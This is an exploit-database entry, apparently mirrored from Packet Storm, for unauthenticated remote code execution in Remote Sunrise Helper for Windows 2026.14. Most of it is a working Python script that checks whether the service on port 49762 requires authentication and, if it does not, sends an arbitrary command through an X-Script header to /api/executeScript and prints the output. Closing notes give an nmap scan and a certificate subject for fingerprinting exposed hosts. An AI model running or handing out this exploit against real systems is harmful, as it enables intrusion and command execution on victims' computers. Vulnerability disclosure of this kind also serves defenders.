Share
## https://sploitus.com/exploit?id=PACKETSTORM:219192
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 - Unauthenticated Remote Code Execution
    # Date: 2026-04-20
    # Exploit Author: Chokri Hammedi
    # Software: https://rs.ltd/latest.php?os=win
    # Vendor: https://rs.ltd/
    # Version: 2026.14
    # Tested on: Windows 10 / Windows 11
    
    
    #!/usr/bin/env python3
    import requests, json, sys, urllib3
    urllib3.disable_warnings()
    
    target = sys.argv[1]
    cmd = sys.argv[2]
    url = f"https://{target}:49762"
    headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}
    
    r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
    data = r.json()
    
    if data.get("requires.auth") == False:
        r = requests.post(f"{url}/api/executeScript", headers={**headers,
    "X-Script": cmd}, verify=False)
        result = json.loads(r.text)
        print(result.get('result', result.get('error', '')))
    else:
        print("[*] Not vulnerable - authentication required")
    
    
    # Additional researcher notes
    
    Identification:
    nmap -p- -T4 <target> --script ssl-cert
    Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US